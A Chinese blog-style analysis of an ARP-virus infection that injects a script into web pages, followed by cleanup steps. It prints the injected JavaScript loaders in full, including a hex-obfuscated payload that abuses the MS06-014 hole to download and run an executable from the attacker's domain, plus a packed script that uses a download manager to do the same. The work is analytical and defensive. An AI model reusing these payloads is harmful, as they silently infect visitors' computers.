arp病毒利用的Javascript技术

　　本文的目的是探讨JS相关技术，并不是以杀毒为主要目的，杀毒只是为讲解一些JS做铺垫的，呵呵，文章有点长，倒杯咖啡或者清茶慢慢看，学习切勿急躁！

　　最近公司的网络中了这两天闹的很欢的ARP病毒，导致大家都无法上网，给工作带来了很大的不方便，在这里写下杀毒的过程，希望对大家能有帮助！

　　现象：

　　打开部分网页显示为乱码，好像是随机的行为，但是看似又不是，因为它一直在监视msn.com，呵呵，可能和微软有仇吧，继续查看源代码，发现头部有一个js文件链接----<script src=http://9-6.in/n.js></script>；

　　来源：

　　经过一番网络搜索，发现这个域名是印度域名，而IP地址却是美国的，而且域名的注册日期是7月25日，看来一切都是预谋好了的，还是不管这个了，先解决问题吧；

　　分析：

　　1、先把（http://9-6.in/n.js）这个JS文件下载下来，代码如下：

　　document.writeln("<script>window.onerror=function(){return true;}</script>");
　　document.writeln("<script src="http://9-6.in/S368/NewJs2.js"></script>");
　　document.writeln("<script>");
　　document.writeln("function StartRun(){");
　　document.writeln("var Then = new Date() ");
　　document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
　　document.writeln("var cookieString = new String(document.cookie)");
　　document.writeln("var cookieHeader = "Cookie1=" ");
　　document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
　　document.writeln("if (beginPosition != -1){ ");
　　document.writeln("} else ");
　　document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ");
　　document.writeln("document.write('<iframe width=0 height=0 src="http://9-6.IN/s368/T368.htm"></iframe>');");
　　document.writeln("}");
　　document.writeln("}");
　　document.writeln("StartRun();");
　　document.writeln("</script>")

　　其中第一句window.onerror=function(){return true;}就先把JS错误屏蔽掉，真够狠的，呵呵，不这样怎么隐藏自己呢，哈哈！然后还有个JS文件 http://9-6.in/S368/NewJs2.js，先继续往下看，找到StartRun();运行一个函数，函数的主要作用是写COOKIE，日期为保存一天，然后还用隐藏框架加载了一个文件（http://9-6.IN/s368/T368.htm），其余就没有什么特别的了；

　　2、下载（http://9-6.in/S368/NewJs2.js）这个文件，代码如下：

StrInfo =　"x3cx73x63x72x69x70x74x3ex77x69x6ex64x6fx77x2ex6fx6ex65x72x72x6fx72x3dx66x75x6ex63x74x69x6fx6ex28x29x7bx72x65x74x75x72x6e x74x72x75x65x3bx7dx3cx2fx73x63x72x69x70x74x3e" +" "+
　"x3cx73x63x72x69x70x74x3e" +" "+
　" x44x5ax3d'\x78x36x38\x78x37x34\x78x37x34\x78x37x30\x78x33x41\x78x32x46\x78x32x46\x78x33x39\x78x32x44\x78x33x36\x78x32x45\x78x36x39\x78x36x45\x78x32x46\x78x35x33\x78x33x33\x78x33x36\x78x33x38\x78x32x46\x78x35x33\x78x33x33\x78x33x36\x78x33x38\x78x32x45\x78x36x35\x78x37x38\x78x36x35'x3b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　"x66x75x6ex63x74x69x6fx6e x47x6ex4dx73x28x6ex29 " +" "+
　"x7b " +" "+
　" x76x61x72 x6ex75x6dx62x65x72x4dx73 x3d x4dx61x74x68x2ex72x61x6ex64x6fx6dx28x29x2ax6ex3b" +" "+
　" x72x65x74x75x72x6e '\x78x37x45\x78x35x34\x78x36x35\x78x36x44\x78x37x30'x2bx4dx61x74x68x2ex72x6fx75x6ex64x28x6ex75x6dx62x65x72x4dx73x29x2b'\x78x32x45\x78x37x34\x78x36x44\x78x37x30'x3b" +" "+
　"x7d " +" "+
　" x74x72x79 " +" "+
　"x7b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　" x76x61x72 x42x66x3dx64x6fx63x75x6dx65x6ex74x2ex63x72x65x61x74x65x45x6cx65x6dx65x6ex74x28"\x78x36x46\x78x36x32\x78x36x41\x78x36x35\x78x36x33\x78x37x34"x29x3b" +" "+
　" x42x66x2ex73x65x74x41x74x74x72x69x62x75x74x65x28"\x78x36x33\x78x36x43\x78x36x31\x78x37x33\x78x37x33\x78x36x39\x78x36x34"x2c"\x78x36x33\x78x36x43\x78x37x33\x78x36x39\x78x36x34\x78x33x41\x78x34x32\x78x34x34\x78x33x39\x78x33x36\x78x34x33\x78x33x35\x78x33x35\x78x33x36\x78x32x44\x78x33x36\x78x33x35\x78x34x31\x78x33x33\x78x32x44\x78x33x31\x78x33x31\x78x34x34\x78x33x30\x78x32x44\x78x33x39\x78x33x38\x78x33x33\x78x34x31\x78x32x44\x78x33x30\x78x33x30\x78x34x33\x78x33x30\x78x33x34\x78x34x36\x78x34x33\x78x33x32\x78x33x39\x78x34x35\x78x33x33\x78x33x36"x29x3b" +" "+
　" x76x61x72 x4bx78x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x34x44\x78x36x39\x78x36x33\x78x37x32\x78x36x46\x78x37x33\x78x36x46\x78x36x36\x78x37x34\x78x32x45\x78x35x38"x2b"\x78x34x44\x78x34x43\x78x34x38\x78x35x34\x78x35x34\x78x35x30"x2c""x29x3b" +" "+
　" x76x61x72 x41x53x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x34x31\x78x36x34\x78x36x46\x78x36x34\x78x36x32\x78x32x45\x78x35x33\x78x37x34\x78x37x32\x78x36x35\x78x36x31\x78x36x44"x2c""x29x3b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　" x41x53x2ex74x79x70x65x3dx31x3b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　" x4bx78x2ex6fx70x65x6ex28"\x78x34x37\x78x34x35\x78x35x34"x2c x44x5ax2cx30x29x3b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　" x4bx78x2ex73x65x6ex64x28x29x3b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　" x4ex73x31x3dx47x6ex4dx73x28x39x39x39x39x29x3b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　" x76x61x72 x63x46x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x35x33\x78x36x33\x78x37x32\x78x36x39\x78x37x30\x78x37x34\x78x36x39\x78x36x45\x78x36x37\x78x32x45\x78x34x36\x78x36x39\x78x36x43\x78x36x35\x78x35x33\x78x37x39\x78x37x33\x78x37x34\x78x36x35\x78x36x44\x78x34x46\x78x36x32\x78x36x41\x78x36x35\x78x36x33\x78x37x34"x2c""x29x3b" +" "+
　" x76x61x72 x4ex73x54x6dx70x3dx63x46x2ex47x65x74x53x70x65x63x69x61x6cx46x6fx6cx64x65x72x28x30x29x3b x4ex73x31x3d x63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2cx4ex73x31x29x3b x41x53x2ex4fx70x65x6ex28x29x3bx41x53x2ex57x72x69x74x65x28x4bx78x2ex72x65x73x70x6fx6ex73x65x42x6fx64x79x29x3b" +" "+
　" x41x53x2ex53x61x76x65x54x6fx46x69x6cx65x28x4ex73x31x2cx32x29x3b x41x53x2ex43x6cx6fx73x65x28x29x3b x76x61x72 x71x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x35x33\x78x36x38\x78x36x35\x78x36x43\x78x36x43\x78x32x45\x78x34x31\x78x37x30\x78x37x30\x78x36x43\x78x36x39\x78x36x33\x78x36x31\x78x37x34\x78x36x39\x78x36x46\x78x36x45"x2c""x29x3b" +" "+
　" x6fx6bx31x3dx63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2b'\x78x35x43\x78x35x43\x78x37x33\x78x37x39\x78x37x33\x78x37x34\x78x36x35\x78x36x44\x78x33x33\x78x33x32'x2c'\x78x36x33\x78x36x44\x78x36x34\x78x32x45\x78x36x35\x78x37x38\x78x36x35'x29x3b" +" "+
　" x71x2ex53x48x65x4cx4cx45x78x65x63x75x74x65x28x6fx6bx31x2c'\x78x32x30\x78x32x46\x78x36x33 'x2bx4ex73x31x2c""x2c"\x78x36x46\x78x37x30\x78x36x35\x78x36x45"x2cx30x29x3b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　"x7d " +" "+
　" x63x61x74x63x68x28x4dx73x49x29 x7b x4dx73x49x3dx31x3b x7d" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　"x3cx2fx73x63x72x69x70x74x3e"
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65"](StrInfo);

　　这个代码有点长哦，而且有保护措施，全部转换为十六进制，不过不要害怕，我们有办法解决，首先得确保你已经安装了UE，然后打开UE，把代码粘贴进去（废话，呵呵），把x替换为%，然后用html代码转换功能，解码，就可以得到第一次解码的代码，第一次？？？，呵呵，这个代码的作者很变态的，做了两次编码，所以我得进行两次解码才行，重复刚才的步骤，然后你就可以看到最终的“原始”代码了；

　　具体的代码我就不帖出来了，有一定的危害性，相信大家看了上面的步骤都能自己找到代码，这里之说一下比较核心的代码吧；

//核心代码
..............
　" var Bf=document.createElement("ojec ");" +" "+
　" Bf.setAttribute("classid","clsid:BD96C556-65A3-11D-983A-C4FC29E36");" +" "+
　" var Kx=Bf.CreateObject("Mic osof .X"+"MLHTTP","");" +" "+
　" var AS=Bf.CreateObject("Adod.S eam","");" +" "+
.............
　" var cF=Bf.CreateObject("Sc ip i g.FileSys emOjec ","");" +" "+
　" var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);" +" "+
　" AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("Shell.Applica io ","");" +" "+
　" ok1=cF.BuildPath(NsTmp+'\\sys em32','cmd.exe');" +" "+
　" q.SHeLLExecute(ok1,' /c '+Ns1,"","ope ",0);" +" "+
..............

　　上面的就是最为核心的代码，利用MS0614漏洞、创建JS异步对象获取病毒（*.exe）文件，然后运行，这样就达到它的目的啦！

　　3、打开 http://9-6.IN/s368/T368.htm查看源代码，又发现一段怪异的JS文件，如下：

<script>
　　eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('x("\0\6\9\5\i\h\j\j\4\f\8\3\2\0\7\1\i\8\2\3\h\g\4\w\v\u\t\b\s\7\r\g\4\e\f\q\8\3\2\0\7\1\e\4\d\c\d\c\p\5\3\o\n\a\6\1\b\m\2\0\1\a\l\0\6\9\5\k")',34,34,'151|164|162|143|42|157|156|160|163|146|145|56|12|
15|76|74|134|75|40|11|51|50|167|155|165|144|57|147|152|70|66|63|123
|eval'.split('|'),0,{}))
</script>

　　可以看出这段代码也是经过加密的了，特征为function(p,a,c,k,e,d)，这种加密方法网上有很多例子，我就不细说了，附上解密代码：

//以下代码为网上搜索所得，版权归原作者所有
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>无标题文档</title>
</head>
<body>
<script>
a=62;　
function encode() {
var code = document.getElementById('code').value;
code = code.replace(/[ ]+/g, '');
code = code.replace(/'/g, "file://'/");
var tmp = code.match(/(w+)/g);
tmp.sort();
var dict = [];
var i, t = '';
for(var i=0; i<tmp .length; i++) {
　 if(tmp[i] != t) dict.push(t = tmp[i]);
}
var len = dict.length;
var ch;
for(i=0; i<len; i++) {
　 ch = num(i);
　 code = code.replace(new RegExp('\b'+dict[i]+'\b','g'), ch);
　 if(ch == dict[i]) dict[i] = '';
}
document.getElementById('code').value = "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}("
　 + "'"+code+"',"+a+","+len+",'"+ dict.join('|')+"'.split('|'),0,{}))";
}
　
function num(c) {
return(c<a ?'':num(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36));
}
　
function run() {
eval(document.getElementById('code').value);
}
function decode() {
var code = document.getElementById('code').value;
code = code.replace(/^eval/, '');
document.getElementById('code').value = eval(code);
}
</script>
<textarea id=code cols=80 rows=20>
　
</textarea><br />
<input type=button onclick=encode() value=编码/>
<input type=button onclick=run() value=执行/>
<input type=button onclick=decode() value=解码/>
</body>
</html>

　　经过解密后代码为：

info =　　　　"<script src="S368.jpg"></script>"
document.write(info)

　　继续打开这个表面象图片的链接，呵呵，当然不会是MM图片了，查看源代码，找到如下代码：

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('E n=1c;12 13(){}12 14(){1d{n=1e 1f("\K\l\r\8\i\3\6\j\3\6\o\3\6\9\C\3\s\K\l\r\8\i\3\6\9\x")}1g(e){Q}E a=n["\15\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\R\7\q\3\v\5\4\l","");1h(a["\7\8\i\3\y\L\m"]("\z\f\l\4\5\9\3\y\3")!=-1){Q}E b=n["\15\3\4\j\3\6\o\3\6\v\5\4\l"]();b=b["\f\r\s\f\4\6"](0,2);b+="\\\v\6\d\k\6\5\J\x\\\K\l\r\8\i\3\J\x\\\1i\3\s\K\l\r\8\i\3\6\\\A\6\d\m\7\q\3\f\\\r\f\3\6\h\d\8\m\7\k\9\7\8\7";n["\j\3\4\p\5\q\q\s\5\h\1j\F\8\4\6\D"](1k,13);E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\7");E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\5");E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\s");E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\h");E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\i");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\7","\S\f\h\6\7\A\4\16\o\5\6 \f\G\8\3\C \w\h\4\7\o\3\N\L\s\T\3\h\4\t\"\C\f\h\6\7\A\4\9\f\l\3\q\q\"\u\g\o\5\6 \d\G\8\3\C \w\h\4\7\o\3\N\L\s\T\3\h\4\t\"\f\l\3\q\q\9\5\A\A\q\7\h\5\4\7\d\8\"\u\g\o\5\6 \5\B\s\B\h\B\i\B\3\B\m\B\k\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\5","\H\g\f\9\U\r\8\t\"\p\V\\\\\v\6\d\k\6\5\J\x\\\\\I\8\4\3\6\8\J\x\\\\\I\F\N\v\17\L\U\F\9\F\N\F \l\4\4\A\1l\O\O\h\1m\x\W\7\18\O\j\X\19\1a\O\i\1n\C\18\Y\Y\W\l\4\Y\1o\"\B\H\B\H\u\g\f\9\U\r\8\t\"\h\z\i\9\3\y\3 \Z\h \4\6\3\3 \h\V\\\\ \Z\m\"\B\H\B\x\u\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\s","\f\9\j\A\3\h\7\5\q\R\d\q\i\3\6\f\t\"\1p\D\1q\d\h\r\z\3\8\4\f\"\u\g\s\G\s\9\f\r\s\f\4\6\7\8\k\t\H\B\s\9\q\5\f\4\I\8\i\3\y\L\m\t\"\\\\\"\u\u\g\s\P\G\"\\\\\q\d\h\5\q\f\J\x\\\\\K\3\z\A\d\6\J\x\\\\\p\d\8\4\3\8\4\9\I\F\1r\\\\\"\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\h","\d\9\1s\5\z\3\j\A\5\h\3\t\s\u\g\m\d\6\t\5\G\H\g\5\S\h\9\I\4\3\z\f\t\u\9\p\d\r\8\4\g\5\P\P\u\10 \o\5\6 \m\G\h\9\I\4\3\z\f\t\u\9\I\4\3\z\t\5\u\9\v\5\4\l\g\m\P\G\"\\\\\j\X\19\1a\1b\1t\x\1u\W\3\y\3\"\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\i","\H\g\4\6\D\10\f\9\F\y\3\h\t\m\u\g\11\h\5\4\h\l\t\3\u\10\11\g\11\C\7\8\i\d\C\9\h\q\d\f\3\t\u\g\S\Z\f\h\6\7\A\4\16");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\v\6\d\4\3\h\4","\x");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\R\7\q\3\v\5\4\l","\h\V\\\C\7\8\i\d\C\f\\\f\D\f\4\3\z\X\1b\\\z\f\l\4\5\9\3\y\3");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\v\5\6\5\z\3\4\3\6",b);n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\F\y\4\17\7\f\4","\9\6\5\6\g\9\M\7\A\g\9\3\y\3\g\9\i\d\h\g\9\h\d\z\g\9\s\7\8\g\9\k\M\g\9\M\g\9\4\5\6\g\9\5\6\T\g\9\q\M\l\g\9\f\7\4\g\9\l\1v\y\g\9\4\k\M\g\9\i\q\q\g\9\d\h\y\g\9\o\s\y\g");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\1w\f\3\6\j\3\4","\x");Q}14();',62,95,'|||x65|x74|x61|x72|x69|x6e|x2e||||x6f||x73|x3b|x63|
x64|x53|x67|x68|x66|odks63ls|x76|x43|x6c|x75|x62|x28|x29|x50|x41|
x31|x78|x6d|x70|x2c|x77|x79|var|x45|x3d|x30|x49|x7e|x54|x4f|x7a|
x58|x2F|x2b|return|x46|x3c|x6a|x52|x3a|x2E|x33|x6D|x2f|x7b|x7d|
function|assort_panel_enabled|pslcdkc|x47|x3e|x4c|x6E|x36|x38|x32|
null|try|new|ActiveXObject|catch|if|x57|x6b|106|x3A|x6B|x6F|x6C|x4d|
x44|x35|x4e|x5B|x5D|x71|x55'.split('|'),0,{}))

　　又是好长的代码，又发现了function(p,a,c,k,e,r)，继续解码，代码很长，请大家自己解码查看吧，这里应用的还是上面的手法，用加密函数加密，然后转换为十六进制，尽最大努力混淆我们的视线，来达到不可告人的目的，这里的代码的主要作用是用另外一种方法下载病毒并运行，思想真的很先进，居然是去调用Web迅雷来下载病毒，然后去运行，作者真的是煞费苦心啊，应用了两种方法下载病毒，“小样，就不信毒不倒你！”，呵呵

　　杀毒：

　　说了半天只是分析了一下ARP病毒发作的时候在干什么，下面就说下关于杀毒的问题，其实现在网上有很多这方面的相关教程，我就简单总结一下我的杀毒过程吧；

　　中了arp病毒必须要先找到中毒的机器

　　给这个机器断网、杀毒

　　恢复局域网

　　其中第一步最关键了，如何才能找到呢？
在局域网随便一台客户机上打开网上邻居，查看工作组计算机，然后等到列表刷新出来后，迅速点击开始-->运行-->cmd-->arp -a回车，如果机器比较多，请多输入几次arp -a，然后仔细查看，你会发现有一台机器的Mac地址和网关的Mac地址相同，恭喜你，这就是那个毒源！
到这台机器的跟前（呵呵，废话真多），剩下的工作相信大家都有很多经验了吧

　　杀毒！装杀毒软件或者进安全模式更甚者重装机器，总之把病毒干掉就行了；

　　最后，到不能打开网页的机器上执行这个命令：点击开始-->运行-->cmd-->arp -d回车，然后就可以了。、

　　终于一切又恢复了平静，是不是很有成就感呢，呵呵！